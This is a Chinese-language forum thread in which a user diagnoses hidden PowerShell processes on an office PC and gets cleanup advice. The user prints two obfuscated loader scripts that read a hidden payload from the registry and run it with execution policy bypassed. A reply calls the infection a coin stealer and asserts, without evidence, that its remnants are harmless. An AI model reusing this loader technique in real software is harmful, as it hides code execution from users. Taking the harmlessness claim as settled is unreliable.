最近發現資源監視器裡的網路活動列表內有一項不明不知道在做什麼的 powershell 的指令在執行,大概會引起約 6KB/s 的流量進來,查了一下來源位址看起來是 Cloudflare,但是我並沒有使用他家的任何服務,有朋友清楚他是在做什麼嗎?
所幸昨天早上發文後,把註冊表裡找到的一串有關 Cloudflare 的機碼刪掉,就沒再出現了,到目前電腦運作也無異狀。
edit:
在下結論下太早了,剛剛這事又再發生了,我注意到有一個很快閃過去的視窗畫面,快到無法觀察,然後他就又出現了,看起來確實有個什麼把他喚醒。這回我沒找到沒看到那個機碼,我還沒能根據 PID 找到他跟哪個程序或是服務有關聯,重開機後不會馬上出現,不知何時會再冒出來。
我想我需要觀察研究一下,有新發現再提出來。
我先把 powershell 暫時在防火牆封鎖掉,不讓出去,反正這台是辦公用電腦,一般不會用到 powershell。然後在發生時用軟體去看找到參數如下,這時有四個 powershell 程序,但是因為防火牆封鎖就沒有出現像一樓那樣的網路流量:
一組是:
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\12D1.tmp\12D2.tmp.ps1"
另一組是:
"powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Windows\System32\32D0.tmp\32D1.tmp.ps1"
還有一組兩個是:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
12D2.tmp.ps1 的內容;
$ZAfxiOPrnmdoE=[ScriptBlock];$mGHuWcURvBavLf=[string];$dUvDiphGDmXe=[char]; icm ($ZAfxiOPrnmdoE::Create($mGHuWcURvBavLf::Join('', ((gp (([regex]::Matches('7r2uoeVa61090pat\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'Oy4gKGyEznc' | % { [char]$_ }))))
32D1.tmp.ps1 的內容:
$gmFNaHCjuf=[ScriptBlock];$IrstKEdjQQuuU=[string];$pVmpWfzISohXGh=[char]; icm ($gmFNaHCjuf::Create($IrstKEdjQQuuU::Join('', ((gp (([regex]::Matches('2Vn4v8sW7ketlaeR\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'z0QPeqTY' | % { [char]$_ }))))
即使 powershell 工作還沒結束掉,這兩個 tmp 資料夾 都可以被刪掉。
這個超出在下能理解的範圍,看到那一堆亂碼,直覺問題看來不小? 請高手指點,謝謝。
你看到有幾個powershell被呼叫執行,就表示電腦已感染幾次。
竊幣程式本身已經被執行過並自我毀滅,你現在所看見的是它所遺留下來的「影子」
它會不斷的被呼叫執行,消耗電腦CPU極微的運算資源。
你可以嘗試刪除所有殘留在你系統內,與它相關的註冊機碼,機碼如果沒有被移除乾淨也不會有影響。它在沒有主程式的狀態下被執行,對電腦而言是無害的。
刪除機碼的方式:
先去微軟下載 Autoruns:
https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
解壓縮 autoruns64.exe,然後右鍵點擊以系統管理員身份運行。
在 Autoruns 選項中,確保「隱藏 Windows 項目」和「隱藏 Microsoft 項目」都沒有勾選,「隱藏空位置」應該被勾選。
在搜尋框中輸入:powershell
依次找到的每個項目,然後查看 Autoruns 的底部窗格,將會看到命令行。
如果它引用了其中一個 *.tmp.ps1 腳本,記下資料夾名稱以便刪除,再右鍵點擊該項目並刪除。
重新啟動電腦,然後從 System32 文件夾中刪除 *.tmp 文件夾。
搜尋註冊表中這兩個值
Oy4gKGyEznc
z0QPeqTY
它可能位於 “HKLM\SOFTWARE\未知”底下,找找看將它和它上一層的機碼資料夾刪除。
All the best!
sophyna wrote:
這是中國內地一個駭客...(恕刪)
感謝指導,可是依指示 Autoruns 在每一項的下方沒找到任何東西...?
註冊表中 Oy4gKGyEznc 有找到,已刪除;z0QPeqTY 沒找到;預感的推測是:這玩藝他可能會隨時另外產生一個新的出來?
Dinjapc wrote:
自己恢復出廠狀態花錢...(恕刪)
很同意您的看法,看起來確實有問題。
不能解決的話,在下傾向重新安裝一個乾淨的系統,反正這只是工作用的電腦,只有一個 C:,只有 Windows、Program Files,上面沒有任何資料,資料都是直接在有保護的 NAS 上存取,再冒出來的話,整個重新安裝應該比較快。
那個在 #4 樓提到被我刪掉的有 Cloudflare 的註冊表重新出現如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\dns]
"Data"="<!--?xml version=\"1.0\" encoding=\"utf-8\"?--><serviceenvironment serviceid="\\" 522d76a4-93e1-47f8-b8ce-07c937ad1a1e\\""="" id="\\" dnsresiliency-cloudflare-live\\"="" revision="\\" 1\""=""><dnsconfigdata><dnsconfigs elementversion="\\" 1\""=""><dnsconfig hostname="\\" slscr.update.microsoft.com\\""="" pingtest="\\" sls="" ping\\""="" domain="\\" .update.microsoft.com\\""="" dnsserver="\\" 162.159.36.2\""=""></dnsconfig><dnsconfig hostname="\\" fe3cr.delivery.mp.microsoft.com\\""="" pingtest="\\" clientwebservice="" ping\\""="" domain="\\" .delivery.mp.microsoft.com\\""="" dnsserver="\\" 162.159.36.2\""=""></dnsconfig></dnsconfigs><flags elementversion="\\" 1\""=""><featureswitchon>1</featureswitchon><enforcenrptrule>0</enforcenrptrule><enforcedomain>0</enforcedomain><skipdefaultdnsresolver>0</skipdefaultdnsresolver></flags></dnsconfigdata></serviceenvironment>"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\SLS]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\SLS\{522D76A4-93E1-47F8-B8CE-07C937AD1A1E}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\SLS\{522D76A4-93E1-47F8-B8CE-07C937AD1A1E}\/SLS/{522D76A4-93E1-47F8-B8CE-07C937AD1A1E}/x64/10.0.19045.3324/0?CH=679&L=zh-TW&P=&PT=0x30&WUA=10.0.19041.3031&MK=ASUS&MD=System+Product+Name]
"Expires"="2023-08-13 11:15:07"
"LastModified"="2001-01-01 00:00:00"
"PotentialFailover"=dword:00000000
"Data"="<!--?xml version=\"1.0\" encoding=\"utf-8\"?--><serviceenvironment serviceid="\\" 522d76a4-93e1-47f8-b8ce-07c937ad1a1e\\""="" id="\\" dnsresiliency-cloudflare-live\\""="" revision="\\" 1\""=""><dnsconfigdata><dnsconfigs elementversion="\\" 1\""=""><dnsconfig hostname="\\" slscr.update.microsoft.com\\""="" pingtest="\\" sls="" ping\\""="" domain="\\" .update.microsoft.com\\""="" dnsserver="\\" 162.159.36.2\""=""></dnsconfig><dnsconfig hostname="\\" fe3cr.delivery.mp.microsoft.com\\""="" pingtest="\\" clientwebservice="" ping\\""="" domain="\\" .delivery.mp.microsoft.com\\""="" dnsserver="\\" 162.159.36.2\""=""></dnsconfig></dnsconfigs><flags elementversion="\\" 1\""=""><featureswitchon>1</featureswitchon><enforcenrptrule>0</enforcenrptrule><enforcedomain>0</enforcedomain><skipdefaultdnsresolver>0</skipdefaultdnsresolver></flags></dnsconfigdata></serviceenvironment>"
"ETag"="\"XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880\""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\SLS\{E7A50285-D08D-499D-9FF8-180FDC2332BC}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SIH\SLS\{E7A50285-D08D-499D-9FF8-180FDC2332BC}\/SLS/{E7A50285-D08D-499D-9FF8-180FDC2332BC}/x64/10.0.19045.3324/0?CH=679&L=zh-TW&P=&PT=0x30&WUA=10.0.19041.3031&MK=ASUS&MD=System+Product+Name]
"Expires"="2023-08-12 23:15:16"
"LastModified"="2001-01-01 00:00:00"
"PotentialFailover"=dword:00000000
"Data"="<!--?xml version=\"1.0\" encoding=\"UTF-8\"?--><serviceenvironment serviceid="\\" e7a50285-d08d-499d-9ff8-180fdc2332bc\\""="" id="\\" sihprod\\""="" revision="\\" 1\""=""><wuclientdata><storeclientdata><sihclientdata><engine elementversion="\\" 1\""=""><actions elementversion="\\" 1\""=""></actions></engine></sihclientdata></storeclientdata></wuclientdata></serviceenvironment>"
"ETag"="\"Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160\""
在編修此文時,發現畫面一閃 powershell 又企圖執行,但是似乎經過上述處理,他很快就被終止,沒有像之前那樣持續執行,看來重新安裝比較妥當,但是重裝之前,我想再觀察一下下一回他是會馬上被終止還是會繼續執行。
從事件記錄可以看到蛛絲馬跡,目前的觀察是他每隔 15min 會企圖啟動一次 powershell,但已無法執行。
關閉廣告